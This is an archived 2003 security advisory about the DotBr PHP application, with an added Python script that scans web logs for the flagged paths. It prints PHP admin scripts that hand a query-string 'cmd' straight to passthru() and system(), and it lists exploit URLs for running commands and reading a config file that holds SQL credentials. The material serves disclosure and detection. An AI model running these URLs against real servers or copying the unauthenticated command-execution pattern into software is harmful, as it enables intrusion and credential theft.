Vulnwatch mailing list archives

DotBr (PHP)


From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 15 Feb 2003 10:55:19 +0100



Information :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Information disclosure
- System command execution


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------


config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name


admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
 if (!isset($sep)) {
   $sep = "_";
 }
 $cmd=str_replace($sep," ",$cmd);
 passthru($cmd,$ret);
 echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------


admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
 $cmd = str_replace("_"," ",$cmd);
 system($cmd,$result);
 echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]



More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n
http://www.phpsecure.org
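
Added example, not part of the original advisory or of DotBr: a log check for the four paths listed above that also reverses the separator substitution done by admin/exec.php3 and admin/system.php3, so the logged `cmd` value reads as the command the script actually ran. The Common Log Format, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths named in the advisory and the problem each one exposes.
PATHS = {
    "/foo.php3": "phpinfo()",
    "/config.inc": "information disclosure",
    "/admin/exec.php3": "command execution",
    "/admin/system.php3": "command execution",
}
# Common Log Format: client, timestamp, request line, status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, harmless commands).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Feb/2003:11:02:41 +0100] "GET /admin/exec.php3?cmd=ls_-la HTTP/1.0" 200 512',
    '192.0.2.10 - - [15/Feb/2003:11:03:02 +0100] "GET /admin/exec.php3?sep=,&cmd=uname,-a HTTP/1.0" 200 80',
    '192.0.2.11 - - [15/Feb/2003:11:04:10 +0100] "GET /dotbr/admin/system.php3?cmd=id HTTP/1.0" 200 60',
    '192.0.2.12 - - [15/Feb/2003:11:05:00 +0100] "GET /config.inc HTTP/1.0" 200 230',
    '192.0.2.13 - - [15/Feb/2003:11:06:00 +0100] "GET /index.php3 HTTP/1.0" 200 4000',
]

def rebuild_command(suffix, query):
    """Undo the separator trick: return cmd as the script passed it to the shell."""
    params = parse_qs(query, keep_blank_values=True)
    if "cmd" not in params:
        return None
    cmd = params["cmd"][-1]
    sep = "_"  # system.php3 always replaces "_"
    if suffix == "/admin/exec.php3":
        sep = params.get("sep", ["_"])[-1]  # exec.php3 lets the caller set $sep
    return cmd.replace(sep, " ") if sep else cmd  # an empty $sep changes nothing

def scan(lines):
    """Return one finding per logged request that reached an advisory path."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        # Match by suffix: the application may be installed in a subdirectory.
        suffix = next((p for p in PATHS if url.path.lower().endswith(p)), None)
        if suffix is None:
            continue
        command = rebuild_command(suffix, url.query) if suffix.startswith("/admin/") else None
        findings.append({"client": client, "path": url.path, "issue": PATHS[suffix],
                         "status": int(status), "command": command})
    return findings
```

Only a `cmd` passed in the query string shows up in an access log; because the scripts read a bare `$cmd`, a value supplied by POST or cookie would leave the command field empty, so any 200 response from the two admin scripts deserves review.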



